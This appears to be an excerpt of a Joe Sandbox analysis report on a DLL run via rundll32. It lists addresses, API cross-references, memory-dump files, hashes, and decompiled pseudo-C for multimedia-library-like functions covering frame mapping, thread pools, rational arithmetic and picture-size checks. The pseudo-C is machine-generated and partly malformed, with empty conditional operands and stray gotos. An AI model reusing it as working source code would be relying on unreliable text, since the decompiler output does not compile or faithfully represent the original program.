0x1001e18a
0x1001e18e
0x1001e194
0x00000000
0x1001e16a
0x1001e16a
0x1001e170
0x1001e2b6
0x1001e2be
0x1001e2c0
0x1001e2c4
0x1001e2c7
0x1001e2cf
0x1001e2d7
0x1001e2df
0x1001e2e4
0x1001e2f0
0x1001e2f1
0x1001e2f2
0x1001e2f5
0x1001e2f9
0x1001e2fd
0x1001e300
0x1001e303
0x1001e306
0x1001e308
0x1001e3c0
0x1001e3c2
0x1001e3c5
0x1001e3c7
0x1001e445
0x00000000
0x1001e3c9
0x1001e3cc
0x1001e3ce
0x1001e43b
0x00000000
0x1001e3d0
0x1001e3d0
0x1001e3d3
0x1001e3d8
0x1001e3de
0x1001e3e0
0x00000000
0x1001e3e2
0x1001e3e7
0x1001e3eb
0x1001e3ee
0x1001e3f1
0x1001e3f3
0x1001e420
0x1001e42a
0x1001e42d
0x1001e432
0x00000000
0x1001e3f5
0x1001e3f5
0x1001e3fb
0x1001e3ff
0x1001e3ff
0x1001e3f3
0x1001e3e0
0x1001e3ce
0x1001e30e
0x1001e311
0x1001e314
0x1001e317
0x1001e31c
0x1001e322
0x1001e324
0x1001e3b0
0x1001e3b0
0x00000000
0x1001e32a
0x1001e32a
0x1001e32f
0x1001e333
0x1001e335
0x00000000
0x1001e337
0x1001e337
0x1001e33d
0x1001e344
0x1001e347
0x1001e34a
0x1001e34f
0x1001e351
0x1001e400
0x1001e400
0x1001e408
0x1001e40b
0x1001e419
0x1001e357
0x1001e35d
0x1001e360
0x1001e368
0x1001e36c
0x1001e371
0x1001e373
0x00000000
0x1001e379
0x1001e379
0x1001e382
0x1001e38b
0x1001e38f
0x1001e393
0x1001e396
0x1001e39f
0x1001e3a2
0x1001e3a7
0x1001e3b5
0x1001e3ba
0x1001e3ba
0x1001e373
0x1001e351
0x1001e335
0x1001e324
0x00000000
0x00000000
0x00000000
0x1001e170
0x1001e168
0x1001e160
0x1001e15b
0x1001e13e
0x1001e12e
0x1001e112
0x1001e112
0x1001e115
0x1001e230
0x1001e230
0x1001e236
0x1001e238
0x1001e292
0x1001e295
0x1001e29a
0x1001e29f
0x1001e2a3
0x1001e2ac
0x1001e197
0x1001e1aa
0x1001e23a
0x1001e23a
0x1001e240
0x1001e245
0x1001e249
0x1001e24d
0x1001e24f
0x1001e253
0x1001e257
0x1001e25b
0x1001e25f
0x1001bc40
0x1001bc41
0x1001bc42
0x1001bc44
0x1001bc47
0x1001bc4b
0x1001bc52
0x1001bc5e
0x1001bc64
0x1001bc6a
0x1001bc70
0x1001bc79
0x1001bc85
0x1001bc8b
0x1001bc91
0x1001bc9b
0x1001bc9d
0x1001bca3
0x1001bcad
0x1001be70
0x1001be7a
0x1001be7e
0x1001be81
0x1001bcb3
0x1001bcb9
0x1001bcc1
0x1001bcc1
0x1001bcad
0x1001bcc7
0x1001bccd
0x1001bcd4
0x1001bcd6
0x1001bdb8
0x1001bdba
0x1001bdc8
0x1001bcdc
0x1001bcdc
0x1001bce6
0x1001be40
0x1001be4a
0x1001be4d
0x1001be52
0x1001be54
0x1001be56
0x00000000
0x1001be5c
0x1001be5c
0x1001be62
0x1001be64
0x00000000
0x1001be6a
0x00000000
0x1001be6a
0x1001be64
0x1001bcec
0x1001bcec
0x1001bcf4
0x1001be90
0x1001be90
0x1001be95
0x1001be99
0x1001be9e
0x1001bea0
0x1001bea2
0x00000000
0x1001bea8
0x1001bea8
0x1001beac
0x1001beaf
0x1001beb4
0x1001beb6
0x1001beb8
0x00000000
0x00000000
0x00000000
0x00000000
0x1001beb8
0x1001bcfa
0x1001bcfa
0x1001bcfa
0x00000000
0x1001bd07
0x1001bd09
0x1001bd22
0x1001bd22
0x1001bd26
0x1001bd00
0x00000000
0x1001bd28
0x1001bd30
0x1001bdd6
0x1001bdd6
0x1001bddc
0x1001bdde
0x1001bdf2
0x1001bdf2
0x1001bdf5
0x1001bed0
0x00000000
0x1001bdfb
0x1001bdfb
0x1001be01
0x1001be06
0x1001be08
0x00000000
0x1001be0a
0x1001be0a
0x1001be0e
0x1001be15
0x1001be1a
0x1001be1d
0x1001be1f
0x00000000
0x1001be21
0x1001be21
0x1001be28
0x1001be2b
0x1001be2d
0x1001be30
0x1001bf96
0x1001bf98
0x1001c033
0x1001c036
0x1001c037
0x1001c038
0x1001c039
0x1001c039
0x1001bf9e
0x1001bfa4
0x1001c01e
0x1001c021
0x1001c024
0x1001c027
0x1001c02a
0x1001c02a
0x1001bfa6
0x1001bfac
0x00000000
0x1001bfb2
0x1001bfb4
0x1001bfbd
0x1001bfc0
0x1001bfc0
0x00000000
0x1001bfc0
0x1001bf66
0x1001bf66
0x1001bf68
0x1001bf6a
0x1001bf6c
0x1001bf72
0x1001bf77
0x1001bf7a
0x1001bf7a
0x1001bf7f
0x1001bf82
0x1001bebe
0x1001bebe
0x1001bebe
0x1001bf88
0x1001bf8c
0x1001bf8e
0x1001bf8e
0x1001bec9
0x00000000
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001be36
0x1001bed3
0x1001bed3
0x1001bed9
0x1001bedb
0x1001bedd
0x1001bee2
0x1001bfdf
0x1001bfe2
0x1001bfe7
0x1001bfea
0x1001bfea
0x1001bee8
0x1001beeb
0x1001bfc7
0x1001bfca
0x1001bfcd
0x1001bfd0
0x1001bfd3
0x1001bfd3
0x1001bef1
0x1001bef7
0x1001bef9
0x1001bef9
0x1001befc
0x1001beff
0x1001bf02
0x1001bf05
0x1001bf05
0x1001bf09
0x1001bf0b
0x1001bf0d
0x1001bf11
0x1001bf13
0x1001bf19
0x1001bf1e
0x1001bf21
0x1001bf21
0x1001bf26
0x1001bf29
0x1001bf2f
0x1001bf2f
0x1001bf32
0x1001bf38
0x1001bf3d
0x1001bf40
0x1001bf43
0x1001c00b
0x1001c00e
0x1001c013
0x1001c016
0x1001c016
0x1001bf49
0x1001bf4c
0x1001bff2
0x1001bff5
0x1001bff8
0x1001bffb
0x1001bffe
0x1001bffe
0x1001bf54
0x1001bf56
0x1001bf56
0x1001bf59
0x1001bf5c
0x1001bf5f
0x1001bf62
0x1001bf62
0x00000000
0x1001bf59
0x1001be1f
0x1001be08
0x1001bde0
0x1001bde0
0x1001bde3
0x1001bde8
0x1001bdee
0x1001bdf0
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bdf0
0x1001bd36
0x1001bd36
0x1001bd3b
0x1001bd45
0x1001bd48
0x1001bd4d
0x1001bd55
0x00000000
0x1001bd57
0x1001bd57
0x1001bd5d
0x1001bd65
0x00000000
0x1001bd67
0x1001bd67
0x1001bd6d
0x1001bd6f
0x1001bd81
0x1001bd81
0x1001bd94
0x1001bd9c
0x1001bda2
0x1001bdad
0x00000000
0x00000000
0x1001bd78
0x1001bd79
0x1001bd7f
0x1001bdd0
0x1001bdd2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd7f
0x1001bdaf
0x00000000
0x1001bdaf
0x1001bd65
0x1001bd55
0x1001bd30
0x1001bd0b
0x1001bd0b
0x1001bd0e
0x1001bd13
0x1001bd1c
0x1001bdb3
0x1001bdb3
0x00000000
0x00000000
0x00000000
0x00000000
0x1001bd1c
0x00000000
0x1001bd09
0x1001bd07
0x1001bcf4
0x1001bce6
0x1001bcd6
0x00000000
0x00000000
0x00000000
0x1001e115
0x1001e110
0x1001e0fe
0x1001e0f3
0x00000000

APIs

mv_frame_unref.MAIN ref: 1001E185
mv_frame_unref.MAIN ref: 1001E240

Strings

Invalid mapping found when attempting unmap., xrefs: 1001E295
Failed to map frame into derived frame context: %d., xrefs: 1001E37D

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_frame_unref
String ID: Failed to map frame into derived frame context: %d.$Invalid mapping found when attempting unmap.
API String ID: 3522828444-968520014
Opcode ID: c51a9e1b472074b834904429bd500262b32e19eb408ec7d04c88999b5f63e95e
Instruction ID: a9b2bb0cb6fdc28be8a2433754fc5c1c364900424f67e1161cdcac98c29180a2
Opcode Fuzzy Hash: c51a9e1b472074b834904429bd500262b32e19eb408ec7d04c88999b5f63e95e
Instruction Fuzzy Hash: 9A91BEB8A097419FC744CF29C58090EBBE0FF88754F16896EE9998B351D730ED81CB82

Uniqueness

Uniqueness Score: -1.00%

Function 1004A328 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 191COMMON

Download Yara Rule

APIs

mv_mallocz.MAIN ref: 1004A35C
mv_calloc.MAIN ref: 1004A389
AcquireSRWLockExclusive.KERNEL32 ref: 1004A474
_beginthreadex.MSVCRT ref: 1004A4B6
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A4ED
ReleaseSRWLockExclusive.KERNEL32 ref: 1004A52F
mvpriv_slicethread_free.MAIN ref: 1004A53E
mv_cpu_count.MAIN ref: 1004A550
mv_mallocz.MAIN ref: 1004A58A
mv_log.MAIN ref: 1004A5D1
abort.MSVCRT ref: 1004A5D6
mv_freep.MAIN ref: 1004A5E2

Strings

j, xrefs: 1004A5A8

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLock$Releasemv_mallocz$Acquire_beginthreadexabortmv_callocmv_cpu_countmv_freepmv_logmvpriv_slicethread_free
String ID: j
API String ID: 2987404029-2137352139
Opcode ID: a1457cafe947b66c241fed8b9d7c715ac0131585819b2ddc446b0be713ed2993
Instruction ID: 08bf606ddb186d207094264f2d447dbf8bdb9a5961cd0d480e83cb1c64d41ca3
Opcode Fuzzy Hash: a1457cafe947b66c241fed8b9d7c715ac0131585819b2ddc446b0be713ed2993
Instruction Fuzzy Hash: 5F81E3B5A087409FD740EF29D48061ABBE0FF89344F11892EF8999B341D775E945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 1009E7E0 Relevance: 24.5, APIs: 4, Strings: 10, Instructions: 48
threadCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E1009E7E0() {
				char _v16;
				void _v76;
				char _v79;
				char _v80;
				intOrPtr _v83;
				intOrPtr _v87;
				intOrPtr _v91;
				intOrPtr _v95;
				intOrPtr _v99;
				intOrPtr _v103;
				intOrPtr _v107;
				intOrPtr _v111;
				intOrPtr _v115;
				char _v119;
				long _v132;
				char* _v136;
				long _t28;
				void* _t30;
				void* _t33;
				void* _t34;
				long _t36;
				void* _t39;
				long* _t41;

				_v119 = 0x6f727245;
				_v115 = 0x6c632072;
				_v111 = 0x696e6165;
				_v107 = 0x7520676e;
				_v103 = 0x70732070;
				_v99 = 0x6b5f6e69;
				_v95 = 0x20737965;
				_v91 = 0x20726f66;
				_v87 = 0x65726874;
				_v83 = 0x206461;
				_v79 = 0;
				_v16 = 0;
				memset( &_v76, 0, 0x10 << 2);
				_t41 = _t39 - 0x88 + 0xc;
				_t28 = GetCurrentThreadId();
				_v132 = 0xa;
				_v136 =  &_v80;
				 *_t41 = _t28;
				__imp___ultoa();
				if(_v80 == 0) {
					L8:
					_t33 = 0x28;
					_t25 =  &_v119; // 0x6f727245
					_t36 = _t25;
					L6:
					_t41[0xf] = 0xa;
					 *((char*)(_t41 + _t33 + 0x15)) = 0;
					L7:
					 *_t41 = _t36;
					OutputDebugStringA(??);
					_t41 = _t41 - 4;
					abort();
					goto L8;
				}
				_t30 = 0x27;
				_t19 =  &_v119; // 0x6f727245
				_t36 = _t19;
				while(1) {
					_t34 = _t30;
					_t30 = _t30 + 1;
					if( *((char*)(_t36 + _t30)) == 0) {
						break;
					}
					if(_t30 == 0x6a) {
						goto L7;
					}
				}
				if(_t30 == 0x6a) {
					goto L7;
				}
				_t33 = _t34 + 2;
				goto L6;
			}

0x1009e7f2
0x1009e7fa
0x1009e802
0x1009e80a
0x1009e812
0x1009e81a
0x1009e822
0x1009e82a
0x1009e832
0x1009e83a
0x1009e842
0x1009e84a
0x1009e852
0x1009e852
0x1009e854
0x1009e85e
0x1009e866
0x1009e86a
0x1009e86d
0x1009e878
0x1009e8bb
0x1009e8bb
0x1009e8c5
0x1009e8c5
0x1009e8a0
0x1009e8a0
0x1009e8a5
0x1009e8aa
0x1009e8aa
0x1009e8ad
0x1009e8b3
0x1009e8b6
0x00000000
0x1009e8b6
0x1009e87a
0x1009e87f
0x1009e87f
0x1009e88d
0x1009e88d
0x1009e88f
0x1009e896
0x00000000
0x00000000
0x1009e88b
0x00000000
0x00000000
0x1009e88b
0x1009e89b
0x00000000
0x00000000
0x1009e89d
0x00000000

APIs

GetCurrentThreadId.KERNEL32 ref: 1009E854
_ultoa.MSVCRT ref: 1009E86D
OutputDebugStringA.KERNEL32 ref: 1009E8AD
abort.MSVCRT ref: 1009E8B6

Strings

eani, xrefs: 1009E802
r cl, xrefs: 1009E7FA
thre, xrefs: 1009E832
ng u, xrefs: 1009E80A
ad , xrefs: 1009E83A
Erro, xrefs: 1009E87F
in_k, xrefs: 1009E81A
p sp, xrefs: 1009E812
for , xrefs: 1009E82A
eys , xrefs: 1009E822

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CurrentDebugOutputStringThread_ultoaabort
String ID: Erro$ad $eani$eys $for $in_k$ng u$p sp$r cl$thre
API String ID: 4191895893-3726152543
Opcode ID: 32d6918716459faddcb7dc1042b6d8857ba7126cf37684ded785e2cb3a3e0069
Instruction ID: 088c25127c847526b46776e24d12a3bdf4591a2816cfb9b61a0b1617db757378
Opcode Fuzzy Hash: 32d6918716459faddcb7dc1042b6d8857ba7126cf37684ded785e2cb3a3e0069
Instruction Fuzzy Hash: 942117B050C3819FE354EF64C19931FBBE2EB81304F909D2DE4894A3A5CBB9C9498B47

Uniqueness

Uniqueness Score: -1.00%

Function 10010320 Relevance: 22.7, APIs: 15, Instructions: 205
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E10010320(intOrPtr* _a4) {
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t97;
				signed int _t100;
				signed int _t106;
				signed int _t112;
				signed int _t118;
				signed int _t124;
				signed int _t130;
				signed int _t136;
				signed int _t139;
				signed int _t147;
				intOrPtr _t148;
				intOrPtr _t149;
				intOrPtr _t150;
				intOrPtr _t151;
				intOrPtr _t152;
				intOrPtr _t153;
				signed int _t154;
				signed int _t158;
				signed int _t172;
				signed int _t174;
				signed int _t176;
				signed int _t178;
				signed int _t180;
				signed int _t182;
				signed int _t184;
				signed int _t186;
				signed int _t187;
				intOrPtr* _t188;
				intOrPtr* _t189;
				signed int _t199;
				void* _t200;
				intOrPtr* _t201;

				_t188 = 0x100b0200;
				_t201 = _t200 - 0x2c;
				_v40 = 0;
				_t189 = _a4;
				while(1) {
					_v40 = _v40 + 1;
					_t188 = _t188 + 0x40;
					if(_v40 == 0x17) {
						break;
					}
					_t6 = _t188 + 0x10; // 0x1000ffb0
					if( *_t6 == 0) {
						continue;
					} else {
						_t9 = _t188 + 0x10; // 0x1000ffb0
						_t10 = _t188 + 0x14; // 0x10010008
						_t172 =  *_t10;
						 *_t201 =  *((intOrPtr*)(_t189 + 0x10));
						_v56 =  *((intOrPtr*)(_t189 + 0x14));
						_v52 =  *_t9;
						_v48 = _t172;
						_t97 = L10032EF0( *((intOrPtr*)(_t189 + 0x14)), _t188, _t189);
						_t147 = _t172;
						_t14 = _t188 + 0x1c; // 0x1000fde8
						_t192 =  <  ? _t97 :  ~_t97;
						_t15 = _t188 + 0x18; // 0x10010060
						_v48 =  *_t14;
						_v52 =  *_t15;
						_t174 =  *((intOrPtr*)(_t189 + 0x1c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x18));
						_v56 = _t174;
						_t100 = L10032EF0(_t147, _t188, _t189);
						 *_t201 =  <  ? _t97 :  ~_t97;
						_v56 = _t147;
						_v48 = _t174;
						_t102 =  <  ? _t100 :  ~_t100;
						_v52 =  <  ? _t100 :  ~_t100;
						_t148 = L10032E70(_t147, _t189);
						_t24 = _t188 + 0x20; // 0x1000fe50
						_t25 = _t188 + 0x24; // 0x0
						_v52 =  *_t24;
						_v48 =  *_t25;
						_t176 =  *((intOrPtr*)(_t189 + 0x24));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x20));
						_v56 = _t176;
						_t106 = L10032EF0(_t148, _t188, _t189);
						 *_t201 = _t148;
						_v56 = _t174;
						_v48 = _t176;
						_t108 =  <  ? _t106 :  ~_t106;
						_v52 =  <  ? _t106 :  ~_t106;
						_t149 = L10032E70(_t148, _t189);
						_t34 = _t188 + 0x28; // 0x0
						_t35 = _t188 + 0x2c; // 0x0
						_v52 =  *_t34;
						_v48 =  *_t35;
						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
						_v56 = _t178;
						_t112 = L10032EF0(_t149, _t188, _t189);
						 *_t201 = _t149;
						_v56 = _t176;
						_v48 = _t178;
						_t114 =  <  ? _t112 :  ~_t112;
						_v52 =  <  ? _t112 :  ~_t112;
						_t150 = L10032E70(_t149, _t189);
						_t44 = _t188 + 0x30; // 0x0
						_t45 = _t188 + 0x34; // 0x0
						_v52 =  *_t44;
						_v48 =  *_t45;
						_t180 =  *((intOrPtr*)(_t189 + 0x34));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
						_v56 = _t180;
						_t118 = L10032EF0(_t150, _t188, _t189);
						 *_t201 = _t150;
						_v56 = _t178;
						_v48 = _t180;
						_t120 =  <  ? _t118 :  ~_t118;
						_v52 =  <  ? _t118 :  ~_t118;
						_t151 = L10032E70(_t150, _t189);
						_t54 = _t188 + 0x38; // 0x0
						_t55 = _t188 + 0x3c; // 0x0
						_v52 =  *_t54;
						_v48 =  *_t55;
						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
						_v56 = _t182;
						_t124 = L10032EF0(_t151, _t188, _t189);
						 *_t201 = _t151;
						_v56 = _t180;
						_v48 = _t182;
						_t126 =  <  ? _t124 :  ~_t124;
						_v52 =  <  ? _t124 :  ~_t124;
						_t152 = L10032E70(_t151, _t189);
						_t64 = _t188 + 4; // 0x1000fea8
						_v52 =  *_t188;
						_v48 =  *_t64;
						_t184 =  *(_t189 + 4);
						 *_t201 =  *_t189;
						_v56 = _t184;
						_t130 = L10032EF0(_t152, _t188, _t189);
						 *_t201 = _t152;
						_v56 = _t182;
						_v48 = _t184;
						_t132 =  <  ? _t130 :  ~_t130;
						_v52 =  <  ? _t130 :  ~_t130;
						_t153 = L10032E70(_t152, _t189);
						_t72 = _t188 + 8; // 0x1000ff00
						_t73 = _t188 + 0xc; // 0x1000ff58
						_v52 =  *_t72;
						_v48 =  *_t73;
						_t186 =  *(_t189 + 0xc);
						 *_t201 =  *((intOrPtr*)(_t189 + 8));
						_v56 = _t186;
						_t136 = L10032EF0(_t153, _t188, _t189);
						 *_t201 = _t153;
						_v56 = _t184;
						_v48 = _t186;
						_t138 =  <  ? _t136 :  ~_t136;
						_v52 =  <  ? _t136 :  ~_t136;
						_t139 = L10032E70(_t153, _t189);
						_v36 = _t186;
						_t154 = _t139;
						_t199 = _t186;
						_v32 = _t186 >> 0x1f;
						_t187 = 0x3e8 * _t154 >> 0x20;
						asm("sbb edx, [esp+0x1c]");
						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
							goto L7;
						} else {
							if(_t199 != 0) {
								continue;
							} else {
								if(_t154 == 0) {
									L8:
									return _v40;
								} else {
									_t158 = _t154 >> 0x1f;
									L7:
									if(_t158 + 1 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
						}
					}
					L11:
				}
				_v40 = 2;
				return _v40;
				goto L11;
			}

0x10010324
0x1001032b
0x1001032e
0x10010332
0x10010340
0x10010340
0x10010344
0x1001034e
0x00000000
0x00000000
0x10010354
0x10010359
0x00000000
0x1001035b
0x10010361
0x10010364
0x10010364
0x10010367
0x1001036a
0x1001036e
0x10010372
0x10010376
0x1001037d
0x1001037f
0x10010384
0x10010387
0x1001038a
0x1001038e
0x10010395
0x10010398
0x1001039b
0x1001039f
0x100103a4
0x100103a7
0x100103ab
0x100103b3
0x100103b6
0x100103bf
0x100103c3
0x100103c6
0x100103c9
0x100103cd
0x100103d4
0x100103d7
0x100103da
0x100103de
0x100103e3
0x100103e6
0x100103ea
0x100103f2
0x100103f5
0x100103fe
0x10010402
0x10010405
0x10010408
0x1001040c
0x10010413
0x10010416
0x10010419
0x1001041d
0x10010422
0x10010425
0x10010429
0x10010431
0x10010434
0x1001043d
0x10010441
0x10010444
0x10010447
0x1001044b
0x10010452
0x10010455
0x10010458
0x1001045c
0x10010461
0x10010464
0x10010468
0x10010470
0x10010473
0x1001047c
0x10010480
0x10010483
0x10010486
0x1001048a
0x10010491
0x10010494
0x10010497
0x1001049b
0x100104a0
0x100104a3
0x100104a7
0x100104af
0x100104b2
0x100104bb
0x100104c1
0x100104c4
0x100104c8
0x100104ce
0x100104d1
0x100104d4
0x100104d8
0x100104dd
0x100104e0
0x100104e4
0x100104ec
0x100104ef
0x100104f8
0x100104fc
0x100104ff
0x10010502
0x10010506
0x1001050d
0x10010510
0x10010513
0x10010517
0x1001051c
0x1001051f
0x10010523
0x1001052b
0x1001052e
0x10010532
0x10010537
0x1001053b
0x10010542
0x10010544
0x1001054d
0x10010553
0x1001055b
0x10010591
0x00000000
0x1001055d
0x1001055f
0x00000000
0x10010565
0x10010567
0x10010576
0x10010581
0x10010569
0x10010569
0x1001056c
0x10010570
0x00000000
0x00000000
0x00000000
0x00000000
0x10010570
0x10010567
0x1001055f
0x1001055b
0x00000000
0x10010359
0x100105a5
0x100105b4
0x00000000

APIs

mv_sub_q.MAIN ref: 10010376
mv_sub_q.MAIN ref: 1001039F
mv_add_q.MAIN ref: 100103BA
mv_sub_q.MAIN ref: 100103DE
mv_add_q.MAIN ref: 100103F9
mv_sub_q.MAIN ref: 1001041D
mv_add_q.MAIN ref: 10010438
mv_sub_q.MAIN ref: 1001045C
mv_add_q.MAIN ref: 10010477
mv_sub_q.MAIN ref: 1001049B
mv_add_q.MAIN ref: 100104B6

Part of subcall function 10032E70: mv_reduce.MAIN(?,?), ref: 10032EC9

mv_sub_q.MAIN ref: 100104D8

Part of subcall function 10032EF0: mv_reduce.MAIN(?), ref: 10032F61

mv_add_q.MAIN ref: 100104F3
mv_sub_q.MAIN ref: 10010517
mv_add_q.MAIN ref: 10010532

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sub_q$mv_add_q$mv_reduce
String ID:
API String ID: 416313997-0
Opcode ID: 16bc828a6e54490581e3bca817dbe7aaeb3a5d58f0d8fddf083b3c311aad9c19
Instruction ID: 137885487f331a62fd44dc5ad255b81a0a07b8edcdf78e8c3b60c95945d2ee5e
Opcode Fuzzy Hash: 16bc828a6e54490581e3bca817dbe7aaeb3a5d58f0d8fddf083b3c311aad9c19
Instruction Fuzzy Hash: 9881B2B4A08B06AFC744DF6AC18151AFBE1FF88251F10C92EE98DC7711E670E8519F82

Uniqueness

Uniqueness Score: -1.00%

Function 1001F1FB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 238
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E1001F1FB(signed int __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t98;
				signed int _t103;
				void* _t117;
				signed int _t121;
				signed int _t125;
				signed int _t129;
				signed int _t133;
				void* _t138;
				void* _t140;
				void* _t141;
				void* _t142;
				signed int _t143;
				signed int _t144;
				void* _t148;
				signed int _t159;
				signed int _t163;
				signed int* _t165;
				void* _t170;
				signed int _t172;
				signed int _t174;
				signed int _t180;
				signed int _t181;
				signed int _t182;
				void* _t183;
				signed char _t184;
				signed int _t190;
				void* _t191;
				signed int _t192;
				signed int _t194;
				void* _t195;
				void* _t197;
				signed int* _t198;
				signed int _t210;

				_t174 = __edx;
				_t198 = _t197 - 0x5c;
				_t165 = _t198[0x1d];
				_t194 = _t198[0x1e];
				_t192 = _t198[0x21];
				 *_t198 = _t198[0x20];
				_t98 = L10031C70();
				_t198[0xb] = _t98;
				_t201 = _t98;
				if(_t98 == 0) {
					L29:
					_t195 = 0xffffffea;
					goto L17;
				} else {
					_t198[1] = _t194;
					_t198[0x11] = 0;
					_t198[0x12] = 0;
					_t198[2] = 0;
					 *_t198 = 0xffffffff;
					_t198[0x10] = 0x100b3560;
					_t103 = L1001E960(_t201);
					asm("cdq");
					asm("sbb edi, edx");
					if(0 >= _t103) {
						_t174 = (0 << 0x00000020 | _t194) << 3;
						_t103 = _t194 << 3;
					}
					_t198[8] = _t103 + 0x400;
					_t105 = _t198[0x1f];
					asm("adc edx, 0x0");
					_t198[9] = _t174;
					if((_t198[0x1f] & 0xffffff00 | _t105 <= 0x00000000 | _t174 & 0xffffff00 | _t194 <= 0x00000000) != 0) {
						L28:
						_t198[3] = _t194;
						_t198[4] = _t198[0x1f];
						_t198[2] = "Picture size %ux%u is invalid\n";
						_t198[1] = 0x10;
						 *_t198 =  &(_t198[0x10]);
						L10023A40();
						goto L29;
					}
					asm("sbb ecx, edx");
					if(0x7ffffffe < _t198[8]) {
						goto L28;
					}
					asm("sbb edi, edx");
					if(0x7ffffffe < (_t198[0x1f] + 0x80) * _t198[8]) {
						goto L28;
					}
					if(_t192 > 7) {
						_t163 = _t194 + 0x00000007 & 0xfffffff8;
						_t210 = _t163;
						_t194 = _t163;
					}
					_t198[2] = _t194;
					 *_t198 = _t165;
					_t198[1] = _t198[0x20];
					_t117 = L1001EAB0(_t210);
					_t211 = _t117;
					_t195 = _t117;
					if(_t117 < 0) {
						L17:
						return _t195;
					} else {
						_t180 =  ~_t192;
						_t121 =  *_t165 + _t192 - 0x00000001 & _t180;
						 *_t165 = _t121;
						_t198[0xc] = _t121;
